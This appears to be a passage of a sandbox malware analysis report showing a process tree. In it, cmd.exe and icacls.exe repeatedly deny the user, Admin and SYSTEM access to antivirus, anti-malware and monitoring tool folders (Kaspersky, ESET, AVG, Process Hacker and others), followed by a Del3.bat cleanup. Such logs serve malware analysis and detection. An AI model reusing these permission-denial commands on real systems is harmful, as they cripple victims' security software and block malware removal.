        C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:4068
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1904
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:376
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:4080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1700
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3080
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3120
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3184
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2060
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1596
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
        8⤵
        
        PID:468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3100
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3392
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1288
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:1472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3432
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:2896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1660
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3520
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
        8⤵
        
        PID:3568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3572
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3592
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3612
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:764
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3700
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3096
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3648
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
        8⤵
        
        PID:2420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3808
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3784
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
        8⤵
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3904
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3936
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3872
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:4028
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:4076
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:4036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2640
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2924
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2620
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3092
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:1700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3144
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1900
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:1284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1688
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2352
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1392
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2016
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:1264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1948
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3344
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:2252
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3396
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1816
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3332
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:2304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3052
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)
        8⤵
        
        PID:2884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1428
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:1236
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3596
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3624
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1600
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3744
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3748
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:1768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:2376
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3756
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3832
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
        7⤵
        
        PID:3876
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3932
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3912
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3916
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3956
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3996
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:4044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2640
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1216
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:2300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2140
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:988
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1528
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:3140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3152
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:272
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:2372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:2020
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\CPUID\HWMonitor" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:3188
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\CPUID\HWMonitor" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:468
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\MSI\MSI Center" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:2580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\QuickCPU" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1956
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\QuickCPU" /deny "Admin":(OI)(CI)(F)
        8⤵
        Modifies file permissions
        
        PID:2748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\NETGATE" /deny "%username%":(OI)(CI)(F)
        7⤵
        
        PID:1296
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\program files\NETGATE" /deny "Admin":(OI)(CI)(F)
        8⤵
        
        PID:312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny %username%:(OI)(CI)F
        7⤵
        
        PID:1392
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Local\Programs\transmission /deny Admin:(OI)(CI)F
        8⤵
        
        PID:3296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)F
        7⤵
        
        PID:3180
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)F
        8⤵
        Modifies file permissions
        
        PID:3196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny %username%:(OI)(CI)F
        7⤵
        
        PID:1300
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor /deny Admin:(OI)(CI)F
        8⤵
        Modifies file permissions
        
        PID:3284
        
        C:\Windows\system32\cmd.exe
        
        cmd /c C:\Programdata\Install\Del3.bat
        7⤵
        
        PID:2932
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        8⤵
        Delays execution with timeout.exe
        
        PID:992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=1032 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=3692 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2108 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1096 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:8
  2⤵
  PID:2916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=3380 --field-trial-handle=1212,i,4676341118879197136,1916824134347734127,131072 /prefetch:1
  2⤵
  PID:3112
